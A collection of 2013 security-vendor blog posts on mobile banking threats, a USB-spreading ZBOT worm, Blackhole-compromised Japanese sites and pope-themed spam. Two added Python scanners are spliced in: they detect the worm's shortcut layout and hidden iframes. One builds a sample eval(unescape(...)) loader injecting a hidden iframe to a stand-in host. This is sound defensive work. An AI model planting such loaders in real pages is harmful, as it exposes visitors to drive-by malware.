    Author Archive - Abigail Pichel (Technical Communications)

    Online banking is one of the many tasks that have been made more convenient by mobile technology. Now, users can purchase products and/or services, pay their bills and manage their finances from anywhere, at any time. However, threats against mobile banking do exist, and they need to be addressed and secured against.

    Some of these threats include:

    • Mobile phishing – malicious mobile websites that pass themselves off as login websites of legitimate organizations, such as banks and social networks. These are designed to trick users into entering their login information. So far, in this quarter, nearly half of all mobile phishing websites spoof financial services websites.
    • Malicious apps – Apps that contain malicious routines, such as stealing information from the device they’ve been installed on. These are usually found either in third-party app stores or malicious websites, and frequently passed off as legitimate apps.
    • Trojanized apps – Legitimate apps that have been turned into malicious apps. These are more dangerous because to the end user, they are completely indistinguishable from the real app. Because of this, the malicious app – and its routines – could be running for a long time, long before the user even suspects anything.


    Figure 1. Distribution of types of mobile phishing pages in Q3 2013 to date

    While banks are taking steps to reduce losses due to mobile banking, in the end, users – both individuals and businesses – must take steps to protect themselves. Users should be familiar with their bank’s mobile banking procedures, in order to more easily spot things that are “off” and could indicate an attack. In general, too, good computing habits will help keep users secure.

    Businesses need to understand and educate their staff about the risks related to online banking, so that the bottom line is not at risk from these threats. This may include guidelines on whether employees can/should use mobile banking from personal devices. In addition, businesses should work together with their bank to look into possible procedures and steps to reduce known risks.

    For more information about mobile banking and how to secure it, we have recently released the latest edition of our Monthly Mobile Report titled Security in Mobile Banking, as well as an e-guide. These discuss the basics of mobile banking, and how they should be secured.

    Posted in Mobile | Comments Off on The Ghost in the (Portable) Machine: Securing Mobile Banking

    The discovery (and subsequent media coverage) of the mobile malware OBAD shows that mobile threats continue to be a serious concern for users. Just like Windows malware, mobile malware are also becoming more sophisticated, both in technique and deployment. This confirms one of our 2013 security predictions.

    OBAD exploits an Android vulnerability to avoid detection and uninstallation. OBAD’s propagation method is notable because of its use of Bluetooth, a routine previously seen in Symbian malware.

    FAKEAV mobile malware routines now include pop-up windows and messages about “infected” apps. Rather than show persistent notifications, mobile ads now lead users to web threats.

    These refinements take advantage of characteristics of the current mobile landscape. Android vulnerabilities are exploited because Android fragmentation makes it difficult to address vulnerabilities. Concern over Android’s update issues may add to the growing worry about mobile malware, and that worry makes it easy for users to fall for mobile FAKEAV.

    Our latest monthly mobile report discusses these emerging threats, issues affecting or influencing these threats, and what you can do to help secure your devices better.

    Posted in Mobile | Comments Off on How PC Threats Go Mobile

    Who says you can’t teach old malware new tricks? Recently, we reported on how ZBOT had made a comeback of sorts in 2013; this was followed by media reports that it was now spreading via Facebook. Now, we have spotted a new ZBOT variant that can spread on its own.

    This particular ZBOT variant arrives through a malicious PDF file disguised as a sales invoice document. If the user opens this file using Adobe Reader, it triggers an exploit which causes the following pop-up window to appear:

    Figure 1. The error message upon execution of the malicious PDF file

    While this is going on, the malicious ZBOT variant – WORM_ZBOT.GJ – is dropped onto the system and run. It is here that several differences start to appear.

    First of all, WORM_ZBOT.GJ has an autoupdate routine: it can download and run an updated copy of itself. Secondly, it can spread onto other systems via removable drives, like USB thumb drives.

    It does this by searching for removable drives and then creating a hidden folder with a copy of itself inside this folder, and a shortcut pointing to the hidden ZBOT copy.

    Figure 2. WORM_ZBOT.GJ Infection Chain

    Figure 3. Portion of WORM_ZBOT.GJ code creating copy of itself
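    The layout described above – a hidden folder holding the worm copy and a shortcut at the drive root pointing into it – is something a defender can look for on a mounted drive. The script below is an added illustration, not Trend Micro's tooling or the worm's code; it approximates "hidden" by a leading-dot folder name (so it runs on any OS, without checking the Windows hidden attribute) and locates the shortcut's target by searching the raw .lnk bytes for the hidden folder name in ASCII or UTF-16LE rather than parsing the Shell Link format. The fake drive, the folder name ".cache", and the placeholder payload are constructed here.

```python
"""Heuristic scan of a removable-drive root for the hidden-folder-plus-shortcut
layout described in the post. Added illustration; not Trend Micro code."""
from __future__ import annotations

import tempfile
from dataclasses import dataclass
from pathlib import Path

# File types a shortcut on a removable drive should not normally launch from a hidden folder.
EXEC_SUFFIXES = {".exe", ".scr", ".com", ".pif"}


@dataclass(frozen=True)
class Finding:
    shortcut: str    # .lnk file at the drive root
    hidden_dir: str  # hidden folder the shortcut references
    payload: str     # executable found inside that folder


def lnk_mentions(lnk_bytes: bytes, name: str) -> bool:
    """True if the raw shortcut bytes contain *name* as ASCII or as UTF-16LE.
    Assumption: a string search stands in for a full Shell Link parser."""
    return (name.encode("ascii", "ignore") in lnk_bytes
            or name.encode("utf-16-le") in lnk_bytes)


def scan_drive_root(root: Path) -> list[Finding]:
    """Flag every .lnk at the root that references a hidden folder holding an executable."""
    findings: list[Finding] = []
    # Assumption: leading-dot names approximate the Windows hidden attribute.
    hidden_dirs = [p for p in root.iterdir() if p.is_dir() and p.name.startswith(".")]
    shortcuts = [p for p in root.iterdir() if p.is_file() and p.suffix.lower() == ".lnk"]
    for lnk in shortcuts:
        data = lnk.read_bytes()
        for hdir in hidden_dirs:
            if not lnk_mentions(data, hdir.name):
                continue
            for payload in hdir.iterdir():
                if payload.is_file() and payload.suffix.lower() in EXEC_SUFFIXES:
                    findings.append(Finding(str(lnk), str(hdir), str(payload)))
    return findings


def build_sample_drive() -> Path:
    """Constructed fixture: a temporary directory laid out like the infected drive."""
    root = Path(tempfile.mkdtemp(prefix="fake_usb_"))
    hidden = root / ".cache"
    hidden.mkdir()
    # Placeholder bytes, not malware; only the name and location matter here.
    (hidden / "update.exe").write_bytes(b"MZ-placeholder")
    # Fake .lnk: a few header bytes, then the target path as UTF-16LE, which is
    # how a real shortcut stores its string data.
    target = r"\.cache\update.exe".encode("utf-16-le")
    (root / "Documents.lnk").write_bytes(b"L\x00\x00\x00" + target)
    (root / "report.docx").write_bytes(b"benign")  # unrelated user file
    return root


if __name__ == "__main__":
    for f in scan_drive_root(build_sample_drive()):
        print(f"shortcut {f.shortcut} -> hidden folder {f.hidden_dir} -> {f.payload}")
```

On a real drive the scan would be pointed at the mount point instead of the constructed fixture; a match is a reason to quarantine the shortcut and the hidden folder and to check the other removable media that drive has touched.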

    This kind of propagation by ZBOT is unusual, to say the least. ZBOT malware is usually distributed by exploit kits and/or malicious attachments. This kind of behavior from ZBOT is not something we’d usually expect to see; it could mean an increase in ZBOT infections moving forward. This unusual behavior, however, is in line with our 2013 predictions, which noted that we believed that older threats would continue to be seen in 2013, although they would have refinements to make them more effective. In the past, some ZBOT variants have used unusual means – like file infectors – to spread as well.

    These threats are some of the newest changes to the crimeware landscape; we earlier documented this particular threat in the paper The Crimeware Evolution. Neither propagating via removable drives nor auto-updating are particularly novel; many malware threats have used these behaviors in the past. Most notably, the Conficker/DOWNAD threat used both of these quite effectively; to this day it is a significant threat. It’s still in the top 10 malware in the Americas and Caribbean in 2012, despite it being several years old.

    We protect Trend Micro users by detecting WORM_ZBOT.GJ, as well as blocking websites related to this threat. We will provide additional information if necessary to protect our users.

    With analysis from Threat Response Engineers Joie Salvio and Alvin Bacani

    Posted in Malware | 1 TrackBack »

    When it comes to cybercriminal targets, it truly is a popularity contest. Multiple sites were found compromised, including those popular with Japanese users. There were 40 compromised domains identified using feedback provided by Trend Micro Deep Discovery; since yesterday almost 60,000 hits have been recorded on these sites.

    One of the compromised sites contains an obfuscated JavaScript (detected as JS_BLACOLE.SMTT) designed to load a hidden iframe that loads behind the user’s browser.

    Figure 1. Encrypted JavaScript inserted onto compromised site

    Figure 2. Decrypted JavaScript that could lead users to malicious sites

    Figure 1 shows the obfuscated JavaScript, or JS_BLACOLE.SMTT, that’s on the compromised site. Figure 2 shows the decrypted JavaScript, which leads users to more malicious sites.

    The hidden iframe loads a .PHP file (detected as JS_BLACOLE.MT) that checks which software is installed on the user’s computer. After checking, it then loads the appropriate exploits. These lead to the download of malicious PDF files, which exploit an old vulnerability (CVE-2010-0188) in Adobe Reader and Acrobat. Other software applications targeted for exploits include Java and Flash. This behavior indicates that the attacker used the Blackhole Exploit Kit in these attacks.
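    Site owners checking their own pages for the two artifacts described above – an iframe that loads out of the visitor's sight, and the obfuscated inline script that injects it – can do a first pass with a simple scanner. The code below is an added example, not Trend Micro's detection logic; its heuristics (tiny or hidden-styled iframes, and scripts that combine eval/unescape-style constructs with a long string literal or a long percent-encoded run) and the sample page are constructed here, and the domains are placeholders.

```python
"""Scan HTML for hidden iframes and eval/unescape-style obfuscated scripts.
Added example; heuristics and sample page are constructed, not Trend Micro's."""
from __future__ import annotations

import re

IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)')""")
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}px", re.I
)
# Constructs that legitimate inline scripts rarely combine but injected loaders often do.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromCharCode", "document.write(")
LONG_LITERAL = re.compile(r"""["'][^"']{120,}["']""")
PERCENT_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}){8,}")


def _attrs(tag: str) -> dict[str, str]:
    """Lower-cased attribute map for one tag (double- or single-quoted values)."""
    return {k.lower(): (v1 or v2) for k, v1, v2 in ATTR.findall(tag)}


def _tiny(value: str) -> bool:
    v = value.strip().lower().removesuffix("px")
    return v in {"0", "1"}


def iframe_is_hidden(tag: str) -> bool:
    """An iframe sized 0/1 px or styled invisible/off-screen is not meant to be seen."""
    a = _attrs(tag)
    if _tiny(a.get("width", "")) or _tiny(a.get("height", "")):
        return True
    return bool(HIDDEN_STYLE.search(a.get("style", "")))


def script_obfuscation_score(body: str) -> int:
    """Count obfuscation signs; 2 or more is treated as suspicious below."""
    score = sum(1 for marker in OBFUSCATION_MARKERS if marker in body)
    if LONG_LITERAL.search(body):
        score += 1
    if PERCENT_RUN.search(body):
        score += 1
    return score


def scan_html(html: str) -> dict[str, list[str]]:
    hidden = [t for t in IFRAME_TAG.findall(html) if iframe_is_hidden(t)]
    suspicious = [b.strip()[:60] for b in SCRIPT_BLOCK.findall(html)
                  if script_obfuscation_score(b) >= 2]
    return {"hidden_iframes": hidden, "obfuscated_scripts": suspicious}


# Constructed sample page: one legitimate embed, one benign script, one injected
# loader of the eval(unescape(...)) kind, and the hidden iframe it drops.
_INJECTED = 'document.write("<iframe src=http://loader.example/s.php width=1 height=1>")'
_ENCODED = "".join(f"%{ord(c):02x}" for c in _INJECTED)
SAMPLE_HTML = f"""
<html><body>
<h1>Class schedule</h1>
<iframe src="https://video.example/embed/123" width="560" height="315"></iframe>
<script>document.getElementById("t").textContent = "today";</script>
<script>eval(unescape("{_ENCODED}"));</script>
<iframe src="http://loader.example/s.php" width="1" height="1" style="visibility:hidden"></iframe>
</body></html>
"""

if __name__ == "__main__":
    result = scan_html(SAMPLE_HTML)
    for tag in result["hidden_iframes"]:
        print("hidden iframe:", tag)
    for snippet in result["obfuscated_scripts"]:
        print("obfuscated script:", snippet, "...")
```

Run against the real site's pages (for example from a crawl of the document root), a hit on either list is a reason to diff the file against a known-good copy from version control or backup and to look for the write path the attacker used, rather than just deleting the injected lines.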

    Users should remember that cybercriminals are catching up with the digital landscape. They will take advantage of any online activity—no matter how mundane—to gain more victims. They are also not selective; one of the (compromised) sites caters to both students and businesses.

    End users should ensure that their installed software is patched, as this can prevent attacks that use old exploits – like this one – from succeeding. Site owners should exercise similar precautions with their installed server software – particularly content management systems – and ensure that their own passwords are sufficiently random and difficult to guess by attackers. Inputs should be sanitized as well, to prevent SQL injection attacks.

    Trend Micro provides protection by blocking related malicious sites and detecting the malware.

    With additional inputs from Threat Researcher Rhena Inocencio and Threats Analyst Yoshikawa Takashi.

    Update as of June 5, 2:15 AM PDT

    The malicious PDF files noted earlier in this post are detected as TROJ_PIDIEF.MT. The files downloaded by this malware are saved with legitimate filenames; however, they are non-executable and non-malicious files despite their .EXE extension. The files could easily be replaced by malware, though; it is possible that this attack was still being tested when it was released into the wild.

    Posted in Exploits, Malware | Comments Off on Compromised Japanese Sites Lead to Malware

    With the amount of media coverage surrounding this year’s papal conclave and inauguration, it’s hardly a surprise that cybercriminals have taken advantage of this event to victimize users. We recently spotted spam that use newly-elected Pope Francis as the subject.

    These email messages use the new pope and controversies surrounding the Catholic Church to pique the recipients’ curiosity. To convince users of the legitimacy of the emails, these cite CNN as the alleged source. A screenshot of an email can be seen below:

    Figure 1. Sample spam entry

    It should be noted that while the topic is supposedly about Pope Francis, the email below calls the new pope Benedict, which is actually the name used by his predecessor.

    Figure 2. Spam entry with wrong headline

    The embedded links lead users to sites which have been compromised by Blackhole Exploit Kits (BHEK). Blackhole Exploit Kits have been used to deliver a wide variety of malware including:

    • Infostealers
    • Backdoors
    • Remote Access Trojans (RATs)
    • Rootkits

    We detect and block all related spammed messages and all associated URLs.

    As for the related malware, we found out that the final payload (detected as TROJ_PIDIEF.SMXY) exploits CVE-2009-0927, a dated vulnerability in Adobe Reader and Acrobat, to perform its routines. Thus, users must ensure that their systems are up-to-date with the latest software update.


    Posted in Bad Sites, Exploits, Malware, Spam | Comments Off on Spammers Bless New Pope with Spam


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice